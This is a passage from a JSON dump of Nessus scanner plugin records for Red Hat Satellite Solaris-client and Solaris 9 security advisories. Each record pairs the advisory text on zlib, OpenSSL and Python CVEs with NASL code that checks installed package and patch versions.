reference:\"rhn-solaris-bootstrap-5.1.1-3\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhn_solaris_bootstrap_5_1_1_3-1-0\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rhn-solaris-bootstrap / rhn_solaris_bootstrap_5_1_1_3\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:05:33", "description": "Red Hat Network Satellite Server version 4.2.3 is now available. This update includes fixes for a number of security issues in Red Hat Network Satellite Server Solaris client components.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nThis release corrects several security vulnerabilities in various components shipped as part of the Red Hat Network Satellite Server Solaris client. In a typical operating environment, these components are not used by the Satellite Server in a vulnerable manner. These security updates will reduce risk should these components be used by other applications.\n\nSeveral flaws in Zlib was discovered. An attacker could create a carefully-crafted compressed stream that would cause an application to crash if the stream is opened by a user. (CVE-2005-2096). An attacker could create a carefully crafted compressed stream that would cause an application to crash if the stream is opened by a user.\n(CVE-2005-1849)\n\nA buffer overflow was discovered in the OpenSSL SSL_get_shared_ciphers() utility function. An attacker could send a list of ciphers to an application that used this function and overrun a buffer (CVE-2006-3738).\n\nA flaw in the SSLv2 client code was discovered. If a client application used OpenSSL to create an SSLv2 connection to a malicious server, that server could cause the client to crash. (CVE-2006-4343)\n\nAn attack on OpenSSL PKCS #1 v1.5 signatures was discovered. Where an RSA key with exponent 3 is used it may be possible for an attacker to forge a PKCS #1 v1.5 signature that would be incorrectly verified by implementations that do not check for excess data in the RSA exponentiation result of the signature. This issue affected applications that use OpenSSL to verify X.509 certificates as well as other uses of PKCS #1 v1.5. (CVE-2006-4339)\n\nOpenSSL contained a software work-around for a bug in SSL handling in Microsoft Internet Explorer version 3.0.2. It is enabled in most servers that use OpenSSL to provide support for SSL and TLS. This work-around could allow an attacker, acting as a 'man in the middle' to force an SSL connection to use SSL 2.0 rather than a stronger protocol, such as SSL 3.0 or TLS 1.0. (CVE-2005-2969)\n\nDuring OpenSSL parsing of certain invalid ASN.1 structures an error condition was mishandled. This can result in an infinite loop which consumed system memory (CVE-2006-2937).\n\nCertain public key types can take disproportionate amounts of time to process in OpenSSL, leading to a denial of service. (CVE-2006-2940)\n\nA flaw was discovered in the way that the Python repr() function handled UTF-32/UCS-4 strings. If an application written in Python used the repr() function on untrusted data, this could lead to a denial of service or possibly allow the execution of arbitrary code with the privileges of the Python application. (CVE-2006-4980)\n\nA flaw was discovered in the strxfrm() function of Python's locale module. Strings generated by this function were not properly NULL-terminated. This may possibly cause disclosure of data stored in the memory of a Python application using this function.\n(CVE-2007-2052)\n\nMultiple integer overflow flaws were discovered in Python's imageop module. If an application written in Python used the imageop module to process untrusted images, it could cause the application to crash, enter an infinite loop, or possibly execute arbitrary code with the privileges of the Python interpreter. (CVE-2007-4965)\n\nA stack-based buffer overflow was discovered in the Python interpreter, which could allow a local user to gain privileges by running a script with a long name from the current working directory.\n(CVE-2006-1542)\n\nUsers of Red Hat Network Satellite Server should upgrade to these updated packages, which contain backported patches to correct these issues.", "cvss3": {"score": null, "vector": null}, "published": "2010-01-10T00:00:00", "type": "nessus", "title": "RHEL 3 / 4 : Solaris client in Satellite Server (RHSA-2008:0525)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-1849", "CVE-2005-2096", "CVE-2005-2969", "CVE-2006-1542", "CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4339", "CVE-2006-4343", "CVE-2006-4980", "CVE-2007-2052", "CVE-2007-4965"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:rhn-solaris-bootstrap", "p-cpe:/a:redhat:enterprise_linux:rhn_solaris_bootstrap_5_0_2_3", "cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:4"], "id": "REDHAT-RHSA-2008-0525.NASL", "href": "https://www.tenable.com/plugins/nessus/43838", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0525. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43838);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2005-1849\", \"CVE-2005-2096\", \"CVE-2005-2969\", \"CVE-2006-1542\", \"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4339\", \"CVE-2006-4343\", \"CVE-2006-4980\", \"CVE-2007-2052\", \"CVE-2007-4965\");\n script_bugtraq_id(19849, 20246, 20247, 20248, 20249, 25696, 28276);\n script_xref(name:\"RHSA\", value:\"2008:0525\");\n\n script_name(english:\"RHEL 3 / 4 : Solaris client in Satellite Server (RHSA-2008:0525)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Red Hat Network Satellite Server version 4.2.3 is now available. This\nupdate includes fixes for a number of security issues in Red Hat\nNetwork Satellite Server Solaris client components.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nThis release corrects several security vulnerabilities in various\ncomponents shipped as part of the Red Hat Network Satellite Server\nSolaris client. In a typical operating environment, these components\nare not used by the Satellite Server in a vulnerable manner. These\nsecurity updates will reduce risk should these components be used by\nother applications.\n\nSeveral flaws in Zlib was discovered. An attacker could create a\ncarefully-crafted compressed stream that would cause an application to\ncrash if the stream is opened by a user. (CVE-2005-2096). An attacker\ncould create a carefully crafted compressed stream that would cause an\napplication to crash if the stream is opened by a user.\n(CVE-2005-1849)\n\nA buffer overflow was discovered in the OpenSSL\nSSL_get_shared_ciphers() utility function. An attacker could send a\nlist of ciphers to an application that used this function and overrun\na buffer (CVE-2006-3738).\n\nA flaw in the SSLv2 client code was discovered. If a client\napplication used OpenSSL to create an SSLv2 connection to a malicious\nserver, that server could cause the client to crash. (CVE-2006-4343)\n\nAn attack on OpenSSL PKCS #1 v1.5 signatures was discovered. Where an\nRSA key with exponent 3 is used it may be possible for an attacker to\nforge a PKCS #1 v1.5 signature that would be incorrectly verified by\nimplementations that do not check for excess data in the RSA\nexponentiation result of the signature. This issue affected\napplications that use OpenSSL to verify X.509 certificates as well as\nother uses of PKCS #1 v1.5. (CVE-2006-4339)\n\nOpenSSL contained a software work-around for a bug in SSL handling in\nMicrosoft Internet Explorer version 3.0.2. It is enabled in most\nservers that use OpenSSL to provide support for SSL and TLS. This\nwork-around could allow an attacker, acting as a 'man in the middle'\nto force an SSL connection to use SSL 2.0 rather than a stronger\nprotocol, such as SSL 3.0 or TLS 1.0. (CVE-2005-2969)\n\nDuring OpenSSL parsing of certain invalid ASN.1 structures an error\ncondition was mishandled. This can result in an infinite loop which\nconsumed system memory (CVE-2006-2937).\n\nCertain public key types can take disproportionate amounts of time to\nprocess in OpenSSL, leading to a denial of service. (CVE-2006-2940)\n\nA flaw was discovered in the way that the Python repr() function\nhandled UTF-32/UCS-4 strings. If an application written in Python used\nthe repr() function on untrusted data, this could lead to a denial of\nservice or possibly allow the execution of arbitrary code with the\nprivileges of the Python application. (CVE-2006-4980)\n\nA flaw was discovered in the strxfrm() function of Python's locale\nmodule. Strings generated by this function were not properly\nNULL-terminated. This may possibly cause disclosure of data stored in\nthe memory of a Python application using this function.\n(CVE-2007-2052)\n\nMultiple integer overflow flaws were discovered in Python's imageop\nmodule. If an application written in Python used the imageop module to\nprocess untrusted images, it could cause the application to crash,\nenter an infinite loop, or possibly execute arbitrary code with the\nprivileges of the Python interpreter. (CVE-2007-4965)\n\nA stack-based buffer overflow was discovered in the Python\ninterpreter, which could allow a local user to gain privileges by\nrunning a script with a long name from the current working directory.\n(CVE-2006-1542)\n\nUsers of Red Hat Network Satellite Server should upgrade to these\nupdated packages, which contain backported patches to correct these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-1849\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-2096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-2969\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-1542\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-2937\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-2940\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-3738\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-4339\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-4343\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-4980\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-2052\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-4965\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2008:0525\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected rhn-solaris-bootstrap and / or\nrhn_solaris_bootstrap_5_0_2_3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(119, 189, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhn-solaris-bootstrap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhn_solaris_bootstrap_5_0_2_3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/07/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x / 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2008:0525\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL3\", rpm:\"rhns-solaris-\") || rpm_exists(release:\"RHEL4\", rpm:\"rhns-solaris-\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Satellite Server\");\n\n if (rpm_check(release:\"RHEL3\", reference:\"rhn-solaris-bootstrap-5.0.2-3\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"rhn_solaris_bootstrap_5_0_2_3-1-0\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"rhn-solaris-bootstrap-5.0.2-3\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhn_solaris_bootstrap_5_0_2_3-1-0\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rhn-solaris-bootstrap / rhn_solaris_bootstrap_5_0_2_3\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:05:30", "description": "Red Hat Network Satellite Server version 5.0.2 is now available. This update includes fixes for a number of security issues in Red Hat Network Satellite Server Solaris client components.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nThis release corrects several security vulnerabilities in various components shipped as part of the Red Hat Network Satellite Server Solaris client. In a typical operating environment, these components are not used by the Satellite Server in a vulnerable manner. These security updates will reduce risk should these components be used by other applications.\n\nTwo denial-of-service flaws were fixed in ZLib. (CVE-2005-2096, CVE-2005-1849)\n\nMultiple flaws were fixed in OpenSSL. (CVE-2006-4343, CVE-2006-4339, CVE-2006-3738, CVE-2006-2940, CVE-2006-2937, CVE-2005-2969)\n\nMultiple flaws were fixed in Python. (CVE-2007-4965, CVE-2007-2052, CVE-2006-4980, CVE-2006-1542)\n\nUsers of Red Hat Network Satellite Server 5.0.1 are advised to upgrade to 5.0.2, which resolves these issues.", "cvss3": {"score": null, "vector": null}, "published": "2010-01-10T00:00:00", "type": "nessus", "title": "RHEL 4 : Solaris client in Satellite Server (RHSA-2008:0264)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-1849", "CVE-2005-2096", "CVE-2005-2969", "CVE-2006-1542", "CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4339", "CVE-2006-4343", "CVE-2006-4980", "CVE-2007-2052", "CVE-2007-4965"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:rhn-solaris-bootstrap", "p-cpe:/a:redhat:enterprise_linux:rhn_solaris_bootstrap_5_0_2_3", "cpe:/o:redhat:enterprise_linux:4"], "id": "REDHAT-RHSA-2008-0264.NASL", "href": "https://www.tenable.com/plugins/nessus/43836", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0264. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43836);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2005-1849\", \"CVE-2005-2096\", \"CVE-2005-2969\", \"CVE-2006-1542\", \"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4339\", \"CVE-2006-4343\", \"CVE-2006-4980\", \"CVE-2007-2052\", \"CVE-2007-4965\");\n script_bugtraq_id(19849, 20246, 20247, 20248, 20249, 22083, 25696, 28276);\n script_xref(name:\"RHSA\", value:\"2008:0264\");\n\n script_name(english:\"RHEL 4 : Solaris client in Satellite Server (RHSA-2008:0264)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Red Hat Network Satellite Server version 5.0.2 is now available. This\nupdate includes fixes for a number of security issues in Red Hat\nNetwork Satellite Server Solaris client components.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nThis release corrects several security vulnerabilities in various\ncomponents shipped as part of the Red Hat Network Satellite Server\nSolaris client. In a typical operating environment, these components\nare not used by the Satellite Server in a vulnerable manner. These\nsecurity updates will reduce risk should these components be used by\nother applications.\n\nTwo denial-of-service flaws were fixed in ZLib. (CVE-2005-2096,\nCVE-2005-1849)\n\nMultiple flaws were fixed in OpenSSL. (CVE-2006-4343, CVE-2006-4339,\nCVE-2006-3738, CVE-2006-2940, CVE-2006-2937, CVE-2005-2969)\n\nMultiple flaws were fixed in Python. (CVE-2007-4965, CVE-2007-2052,\nCVE-2006-4980, CVE-2006-1542)\n\nUsers of Red Hat Network Satellite Server 5.0.1 are advised to upgrade\nto 5.0.2, which resolves these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-1849\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-2096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-2969\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-1542\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-2937\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-2940\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-3738\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-4339\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-4343\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-4980\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-2052\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-4965\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2008:0264\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected rhn-solaris-bootstrap and / or\nrhn_solaris_bootstrap_5_0_2_3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119, 189, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhn-solaris-bootstrap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhn_solaris_bootstrap_5_0_2_3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/07/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/05/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2008:0264\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL4\", rpm:\"rhns-solaris-\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Satellite Server\");\n\n if (rpm_check(release:\"RHEL4\", reference:\"rhn-solaris-bootstrap-5.0.2-3\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhn_solaris_bootstrap_5_0_2_3-1-0\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rhn-solaris-bootstrap / rhn_solaris_bootstrap_5_0_2_3\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:13:31", "description": "SunOS 5.9: wanboot and pkg utilities Patch.\nDate this patch was last updated by Sun : Oct/31/11", "cvss3": {"score": null, "vector": null}, "published": "2007-09-25T00:00:00", "type": "nessus", "title": "Solaris 9 (sparc) : 117123-10", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-4339", "CVE-2006-5201", "CVE-2006-7140"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS9_117123.NASL", "href": "https://www.tenable.com/plugins/nessus/26166", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(26166);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-4339\", \"CVE-2006-5201\", \"CVE-2006-7140\");\n\n script_name(english:\"Solaris 9 (sparc) : 117123-10\");\n script_summary(english:\"Check for patch 117123-10\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 117123-10\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SunOS 5.9: wanboot and pkg utilities Patch.\nDate this patch was last updated by Sun : Oct/31/11\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/117123-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"You should install this patch for your system to be up-to-date.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cwe_id(310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/09/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"117123-10\", obsoleted_by:\"\", package:\"SUNWhea\", version:\"11.9.0,REV=2002.04.06.15.27\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"117123-10\", obsoleted_by:\"\", package:\"SUNWcar\", version:\"11.9.0,REV=2002.04.09.12.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"117123-10\", obsoleted_by:\"\", package:\"SUNWwbsup\", version:\"11.9.0,REV=2003.08.06.16.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"117123-10\", obsoleted_by:\"\", package:\"SUNWcsu\", version:\"11.9.0,REV=2002.04.06.15.27\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"117123-10\", obsoleted_by:\"\", package:\"SUNWcsr\", version:\"11.9.0,REV=2002.04.06.15.27\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"117123-10\", obsoleted_by:\"\", package:\"SUNWarc\", version:\"11.9.0,REV=2002.04.06.15.27\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-08-19T13:13:09", "description": "SunOS 5.9_x86: wanboot and pkg utilities Patch.\nDate this patch was last updated by Sun : Oct/31/11", "cvss3": {"score": null, "vector": null}, "published": "2007-10-12T00:00:00", "type": "nessus", "title": "Solaris 9 (x86) : 122715-03", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-4339", "CVE-2006-5201", "CVE-2006-7140"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS9_X86_122715.NASL", "href": "https://www.tenable.com/plugins/nessus/27031", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(27031);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-2937\", 